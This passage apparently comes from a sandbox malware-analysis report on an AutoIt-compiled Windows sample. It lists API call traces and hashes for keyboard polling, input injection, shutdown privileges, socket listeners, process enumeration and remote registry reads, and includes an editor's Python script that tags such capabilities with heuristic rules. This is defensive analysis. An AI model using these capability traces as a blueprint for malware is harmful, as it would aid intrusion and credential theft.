                                                                  • Opcode Fuzzy Hash: f7a365d32e40b45eb82059529122a1d78e20bef80bd7b44e9c20ec0261b3efff
                                                                  • Instruction Fuzzy Hash: EC3191B24183849AC331DBE48889EDBB7DCAF56310F404A1FF5D9C3142EA35D5198BA7
                                                                  APIs
                                                                    • Part of subcall function 002E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002E2BB5,?,?), ref: 002E3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E328E
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002E332D
                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002E33C5
                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002E3604
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E3611
                                                                  Similarity
                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1240663315-0
                                                                  • Opcode ID: 9724cc2b07e1fed2e9527d2171c06a8d33ce4226b49628a48abcb7381f5c654c
                                                                  • Instruction ID: a72bf4c6419779e48ccae0a15d6ef9e386e1e5691debf4e85d1edc283c2350ab
                                                                  • Opcode Fuzzy Hash: 9724cc2b07e1fed2e9527d2171c06a8d33ce4226b49628a48abcb7381f5c654c
                                                                  • Instruction Fuzzy Hash: C2E15835615240AFCB15EF29C895E2ABBE8EF88710F44886DF44ADB2A1CB30ED15CF51
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 002C2B5F
                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 002C2BE0
                                                                  • GetKeyState.USER32(000000A0), ref: 002C2BFB
                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 002C2C15
                                                                  • GetKeyState.USER32(000000A1), ref: 002C2C2A
                                                                  • GetAsyncKeyState.USER32(00000011), ref: 002C2C42
                                                                  • GetKeyState.USER32(00000011), ref: 002C2C54
                                                                  • GetAsyncKeyState.USER32(00000012), ref: 002C2C6C
                                                                  • GetKeyState.USER32(00000012), ref: 002C2C7E
                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 002C2C96
                                                                  • GetKeyState.USER32(0000005B), ref: 002C2CA8
                                                                  Similarity
                                                                  • API ID: State$Async$Keyboard
                                                                  • String ID:
                                                                  • API String ID: 541375521-0
                                                                  • Opcode ID: a2caf77192f6e6d6bd8f6201864ca260eb6527cac9bb2e1c913e81c583d26ced
                                                                  • Instruction ID: 9d9f5bf389e222fc3f92235b5074e8b9cf886a298e98c3097c6e5907d5f1c377
                                                                  • Opcode Fuzzy Hash: a2caf77192f6e6d6bd8f6201864ca260eb6527cac9bb2e1c913e81c583d26ced
                                                                  • Instruction Fuzzy Hash: 2141C4305147CBA9FF359F608814BA9BEA06F12308F04425FD9C6562C1DFA49EECC7A2
                                                                  Similarity
                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                  • String ID:
                                                                  • API String ID: 1737998785-0
                                                                  • Opcode ID: 4a951aba056708c724381485a9c56d95bb5e4e88dc7793fb6bf04121e8ed01b9
                                                                  • Instruction ID: 1382a91db9cc80b4a03b6dea0e9534b377a7f369d23a40b0f10cdbad6a7ea717
                                                                  • Opcode Fuzzy Hash: 4a951aba056708c724381485a9c56d95bb5e4e88dc7793fb6bf04121e8ed01b9
                                                                  • Instruction Fuzzy Hash: 52218B31321214AFDB12AFA4EC59B2D77E9EF04710F04841BF94A9B2A1CB71EC108F50
                                                                  APIs
                                                                    • Part of subcall function 002B9ABF: CLSIDFromProgID.OLE32 ref: 002B9ADC
                                                                    • Part of subcall function 002B9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 002B9AF7
                                                                    • Part of subcall function 002B9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 002B9B05
                                                                    • Part of subcall function 002B9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 002B9B15
                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002DC235
                                                                  • _memset.LIBCMT ref: 002DC242
                                                                  • _memset.LIBCMT ref: 002DC360
                                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 002DC38C
                                                                  • CoTaskMemFree.OLE32(?), ref: 002DC397
                                                                  Strings
                                                                  • NULL Pointer assignment, xrefs: 002DC3E5
                                                                  Similarity
                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                  • String ID: NULL Pointer assignment
                                                                  • API String ID: 1300414916-2785691316
                                                                  • Opcode ID: 07eaee4772e3c203411b34d6b7506210c42132c3133ed8204986c0240fd59f9c
                                                                  • Instruction ID: 3e223c4e72f762fbf1d13d038a695d1ed6bc0caa0b7245c2fb31db55d7bacb51
                                                                  • Opcode Fuzzy Hash: 07eaee4772e3c203411b34d6b7506210c42132c3133ed8204986c0240fd59f9c
                                                                  • Instruction Fuzzy Hash: 76916C71D11219EBDB10DFA4DC95EEEBBB8EF08310F20815AF519A7281DB709A55CFA0
                                                                  APIs
                                                                    • Part of subcall function 002BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
                                                                    • Part of subcall function 002BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
                                                                    • Part of subcall function 002BB134: GetLastError.KERNEL32 ref: 002BB1BA
                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 002C7A0F
                                                                  Similarity
                                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                  • String ID: $@$SeShutdownPrivilege
                                                                  • API String ID: 2234035333-194228
                                                                  • Opcode ID: 136524cbcfface99320c26004455ec285a10c337268d386d6624cd9fd9db8568
                                                                  • Instruction ID: 0fbeff65c40acfb4bd7b985d61a28889e2bb9f8f5fe839891aa29c28af17bd2d
                                                                  • Opcode Fuzzy Hash: 136524cbcfface99320c26004455ec285a10c337268d386d6624cd9fd9db8568
                                                                  • Instruction Fuzzy Hash: 9501F7716792126BF72D2A78CC5AFBF325C9B00340F240A2DFD03A20D2D6A09E2089A0
                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002D8CA8
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8CB7
                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 002D8CD3
                                                                  • listen.WSOCK32(00000000,00000005), ref: 002D8CE2
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 002D8CFC
                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 002D8D10
                                                                  Similarity
                                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                                  • String ID:
                                                                  • API String ID: 1279440585-0
                                                                  • Opcode ID: ba9b45b22ebadc7f989e433e051c42b88fc5e9262631adacf64a6784c6a80f35
                                                                  • Instruction ID: f58761d9c03c61a533695b538620efe00cbd91f1b9a5ac6d8a783eba01b62798
                                                                  • Opcode Fuzzy Hash: ba9b45b22ebadc7f989e433e051c42b88fc5e9262631adacf64a6784c6a80f35
                                                                  • Instruction Fuzzy Hash: 0021EF31621201EFCB15EF68CC95B6EB7E9EF48720F10815AF916AB3D2CB70AD518B51
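The API listings in these function records are the per-function call traces Joe Sandbox recovered from the main module at 0x280000. Because the sample is flagged as a compiled AutoIt script, sequences such as ExitWindowsEx after enabling SeShutdownPrivilege, socket/bind/listen, Toolhelp32 process enumeration, RegConnectRegistryW followed by RegQueryValueExW, and GetAsyncKeyState/GetKeyState on the modifier keys are most likely the AutoIt runtime's own library functions, which ship in every compiled AutoIt binary whether or not the embedded script calls them; they describe capability present in the stub, not behaviour observed at run time. The script below is an added example, not Joe Sandbox's code and not part of this report: it parses API bullet lines in exactly the format printed on this page, decodes a few well-known constant arguments (virtual-key codes, socket family/type/protocol, Toolhelp snapshot flags, CLSCTX and SECURITY_INFORMATION bits), and tags each function with the behaviour its call set implies. The sample records embedded in it are copied from this page; the behaviour rules are the editor's own heuristics, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings (added example, not Joe Sandbox code)."""
import re

# One API bullet line as printed in the report, e.g.
#   • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002D8CA8
#   • _memset.LIBCMT ref: 002BA6E5
#   • Part of subcall function 002BB134: GetLastError.KERNEL32 ref: 002BB1BA
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Standard Win32 / Winsock constants for the handful of arguments worth decoding.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL",
            0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
TH32CS = {0x1: "TH32CS_SNAPHEAPLIST", 0x2: "TH32CS_SNAPPROCESS", 0x4: "TH32CS_SNAPTHREAD", 0x8: "TH32CS_SNAPMODULE"}
SECINFO = {0x1: "OWNER_SECURITY_INFORMATION", 0x2: "GROUP_SECURITY_INFORMATION",
           0x4: "DACL_SECURITY_INFORMATION", 0x8: "SACL_SECURITY_INFORMATION"}
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}

# Editor's heuristics (assumption, not Joe Sandbox signatures): an API set that implies a behaviour.
RULES = [
    ({"GetUserObjectSecurity", "AddAce", "SetUserObjectSecurity"}, "window-station/desktop DACL modification"),
    ({"FindFirstFileW", "DeleteFileW", "FindNextFileW"}, "wildcard file deletion loop"),
    ({"RegConnectRegistryW", "RegQueryValueExW"}, "remote registry read"),
    ({"GetAsyncKeyState", "GetKeyState"}, "modifier-key state polling"),
    ({"CoInitializeSecurity", "CoCreateInstanceEx"}, "DCOM object instantiation"),
    ({"LookupPrivilegeValueW", "AdjustTokenPrivileges", "ExitWindowsEx"}, "shutdown/logoff with privilege adjustment"),
    ({"socket", "bind", "listen"}, "TCP listener (socket/bind/listen)"),
    ({"CreateToolhelp32Snapshot", "Process32FirstW"}, "process enumeration (Toolhelp32)"),
]


def _hexarg(args, index):
    """index-th argument as an int; None when it is '?', empty, or absent (the report prints raw hex)."""
    if index >= len(args) or args[index] in ("", "?"):
        return None
    try:
        return int(args[index], 16)
    except ValueError:
        return None


def decode_args(name, args):
    """Translate well-known numeric arguments of selected APIs into constant names."""
    notes = []
    if name in ("GetAsyncKeyState", "GetKeyState"):
        vk = _hexarg(args, 0)
        if vk in VK_NAMES:
            notes.append(VK_NAMES[vk])
    elif name == "socket":
        af, typ, proto = (_hexarg(args, i) for i in range(3))
        notes += [n for n in (AF.get(af), SOCK.get(typ), PROTO.get(proto)) if n]
    elif name == "listen" and _hexarg(args, 1) is not None:
        notes.append(f"backlog={_hexarg(args, 1)}")
    elif name == "CreateToolhelp32Snapshot":
        notes += [n for bit, n in TH32CS.items() if (_hexarg(args, 0) or 0) & bit]
    elif name == "SetUserObjectSecurity":
        notes += [n for bit, n in SECINFO.items() if (_hexarg(args, 1) or 0) & bit]
    elif name == "CoCreateInstanceEx":
        notes += [n for bit, n in CLSCTX.items() if (_hexarg(args, 2) or 0) & bit]
    return notes


def parse_records(text):
    """Split a report excerpt into per-function records, decode arguments and tag behaviours."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":                     # start of one function's API listing
            current = {"calls": [], "tags": [], "first_ref": None}
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            current["calls"].append({"name": m.group("name"), "module": m.group("module"), "args": args,
                                     "ref": m.group("ref"), "subcall": m.group("sub"),
                                     "notes": decode_args(m.group("name"), args)})
        elif line.strip():                             # Strings / Memory Dump Source / ... end the listing
            current = None
    for rec in records:
        names = {c["name"] for c in rec["calls"]}
        rec["tags"] = [label for need, label in RULES if need <= names]
        direct = [c for c in rec["calls"] if c["subcall"] is None] or rec["calls"]
        rec["first_ref"] = direct[0]["ref"] if direct else None   # address inside the function itself
    return [r for r in records if r["calls"]]


# Constructed input: four records copied from this report's listings (others omitted for brevity).
SAMPLE = """\
APIs
  • Part of subcall function 002BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
  • Part of subcall function 002BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
  • Part of subcall function 002BB134: GetLastError.KERNEL32 ref: 002BB1BA
  • ExitWindowsEx.USER32(?,00000000), ref: 002C7A0F
Strings
APIs
  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002D8CA8
  • bind.WSOCK32(00000000,?,00000010), ref: 002D8CD3
  • listen.WSOCK32(00000000,00000005), ref: 002D8CE2
  • closesocket.WSOCK32(00000000,00000000), ref: 002D8D10
Memory Dump Source
APIs
  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002C6554
  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002C6564
  • Process32NextW.KERNEL32(00000000,0000022C), ref: 002C6583
APIs
  • GetAsyncKeyState.USER32(000000A0), ref: 002C2BE0
  • GetKeyState.USER32(00000011), ref: 002C2C54
  • GetAsyncKeyState.USER32(0000005B), ref: 002C2C96
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec["first_ref"], rec["tags"])
        for c in rec["calls"]:
            print("    " + ("sub  " if c["subcall"] else "     ") + c["name"], c["notes"])
```

Subcall entries are kept in the call set on purpose: the shutdown record only qualifies because LookupPrivilegeValueW and AdjustTokenPrivileges live in the callee at 002BB134, and dropping them would hide the privilege adjustment. Treat the resulting tags as capability labels for the AutoIt stub; the behaviour actually observed for this sample is what the dynamic signatures (injection, credential theft, DNS to low-reputation domains) report.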
                                                                  APIs
                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002C6554
                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 002C6564
                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 002C6583
                                                                  • __wsplitpath.LIBCMT ref: 002C65A7
                                                                  • _wcscat.LIBCMT ref: 002C65BA
                                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 002C65F9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                  • String ID:
                                                                  • API String ID: 1605983538-0
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$2
                                                                  • API String ID: 0-1459993113
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 002C13DC
                                                                  Similarity
                                                                  • API ID: lstrlen
                                                                  • String ID: ($,23$<23$|
                                                                  • API String ID: 1659193697-124797785
                                                                  APIs
                                                                    • Part of subcall function 002DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 002DA84E
                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 002D9296
                                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 002D92B9
                                                                  Similarity
                                                                  • API ID: ErrorLastinet_addrsocket
                                                                  • String ID:
                                                                  • API String ID: 4170576061-0
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002CEB8A
                                                                  • _wcscmp.LIBCMT ref: 002CEBBA
                                                                  • _wcscmp.LIBCMT ref: 002CEBCF
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 002CEBE0
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002CEC0E
                                                                  Similarity
                                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 2387731787-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                  • String ID:
                                                                  • API String ID: 292994002-0
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,0029E014,76230AE0,0029DEF1,0031DC38,?,?), ref: 0029E02C
                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0029E03E
                                                                  Similarity
                                                                  • API ID: AddressLibraryLoadProc
                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                  • API String ID: 2574300362-192647395
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 0029B22F
                                                                    • Part of subcall function 0029B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0029B5A5
                                                                  Similarity
                                                                  • API ID: Proc$LongWindow
                                                                  • String ID:
                                                                  • API String ID: 2749884682-0
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002D43BF,00000000), ref: 002D4FA6
                                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002D4FD2
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                                  • String ID:
                                                                  • API String ID: 599397726-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: \Q3
                                                                  • API String ID: 4104443479-2258043845
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CE20D
                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 002CE267
                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 002CE2B4
                                                                  Similarity
                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1682464887-0
                                                                  APIs
                                                                    • Part of subcall function 0029F4EA: std::exception::exception.LIBCMT ref: 0029F51E
                                                                    • Part of subcall function 0029F4EA: __CxxThrowException@8.LIBCMT ref: 0029F533
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002BB180
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002BB1AD
                                                                  • GetLastError.KERNEL32 ref: 002BB1BA
                                                                  Similarity
                                                                  • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 1922334811-0
                                                                  • Opcode ID: f3120c01d94cdeae2c1814b4ec0a0600b8c9b92008cb63252d8d99942c67c338
                                                                  • Instruction ID: 5810f35f23e22bc9df4e4349fbfccc41d6be0b9588b9139405fe19a5eec6b6ba
                                                                  • Opcode Fuzzy Hash: f3120c01d94cdeae2c1814b4ec0a0600b8c9b92008cb63252d8d99942c67c338
                                                                  • Instruction Fuzzy Hash: 9C11BFB1420205AFE7189F58DC95D6BB7ECFB44350B20852EE05A93240EBB0FC518B60
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002C6623
                                                                  • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002C6664
                                                                  • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002C666F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle
                                                                  • String ID:
                                                                  • API String ID: 33631002-0
                                                                  • Opcode ID: beed37544938f56b40bb9bec4c66cc9c7cba6c9810e36dc5cceba482872354ab
                                                                  • Instruction ID: f079867694c6b51169833017c2ea2ff02057e8a28fc7e44b54d69f885c897245
                                                                  • Opcode Fuzzy Hash: beed37544938f56b40bb9bec4c66cc9c7cba6c9810e36dc5cceba482872354ab
                                                                  • Instruction Fuzzy Hash: C3115E71E11228BFDB118FA4DC45FAEBBFCEB49B10F104266F910E7290D7B05A018BA5
                                                                  APIs
                                                                  • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002C7223
                                                                  • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002C723A
                                                                  • FreeSid.ADVAPI32(?), ref: 002C724A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                   • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                  • String ID:
                                                                  • API String ID: 3429775523-0
                                                                  • Opcode ID: caa902ca2e65f5d58d38ff11c0b2d7d130301904d25a823588919feefab7f4cc
                                                                  • Instruction ID: 26d043aa98ace9f010cd0ba4a0afdfe20f528f03c078559c4f5aa97de3f3d636
                                                                  • Opcode Fuzzy Hash: caa902ca2e65f5d58d38ff11c0b2d7d130301904d25a823588919feefab7f4cc
                                                                  • Instruction Fuzzy Hash: 90F01D76A15209BFDF05DFE4DD99EEEBBFCEF08301F10446AA606E2191E2709A448B10
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002CF599
                                                                  • FindClose.KERNEL32(00000000), ref: 002CF5C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Find$CloseFileFirst
                                                                  • String ID:
                                                                  • API String ID: 2295610775-0
                                                                  • Opcode ID: b9176824f9d93fb090db1d85a954780ce312fea38fff1bee4d1d3746154d0e46
                                                                  • Instruction ID: ae3afe59346122e0eeb61517452cf1f50a5fe6b6d6197cafb6c9c1b030d46aa7
                                                                  • Opcode Fuzzy Hash: b9176824f9d93fb090db1d85a954780ce312fea38fff1bee4d1d3746154d0e46
                                                                  • Instruction Fuzzy Hash: 6911A5316106009FD700EF28D845A2EB3E9FF84324F00851EF965D7291DB30E9148F81
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,002DBE6A,?,?,00000000,?), ref: 002CCEA7
                                                                  • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,002DBE6A,?,?,00000000,?), ref: 002CCEB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFormatLastMessage
                                                                  • String ID:
                                                                  • API String ID: 3479602957-0
                                                                  • Opcode ID: 45ebead886da2ff41a72235d429a842e81257c31fb0b5f06aecb7705294ba03a
                                                                  • Instruction ID: d7f1a29c9c0528ce0bc4adee61eabfa4beea329d19a59bcf195e8089308d6961
                                                                  • Opcode Fuzzy Hash: 45ebead886da2ff41a72235d429a842e81257c31fb0b5f06aecb7705294ba03a
                                                                  • Instruction Fuzzy Hash: 5EF08235111229ABDB10AFA4DC49FEA77ADBF09351F004166F919D6181D7709A50CBA4
                                                                  APIs
                                                                  • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002C4153
                                                                  • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 002C4166
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: InputSendkeybd_event
                                                                  • String ID:
                                                                  • API String ID: 3536248340-0
                                                                  • Opcode ID: 13317a0bafccaf50d9bd2d2de3c0195638bd7c358b1df017427ed79a7254b71a
                                                                  • Instruction ID: f1baae883bb7ae704491bc6e36a850379b2d6097c2ec56e3c837b4cd5983a486
                                                                  • Opcode Fuzzy Hash: 13317a0bafccaf50d9bd2d2de3c0195638bd7c358b1df017427ed79a7254b71a
                                                                  • Instruction Fuzzy Hash: DDF0677081024EAFDB069FA0CC15BBE7FB4EF00305F04800AF966A6192D7B986129FA0
                                                                  APIs
                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002BACC0), ref: 002BAB99
                                                                  • CloseHandle.KERNEL32(?,?,002BACC0), ref: 002BABAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
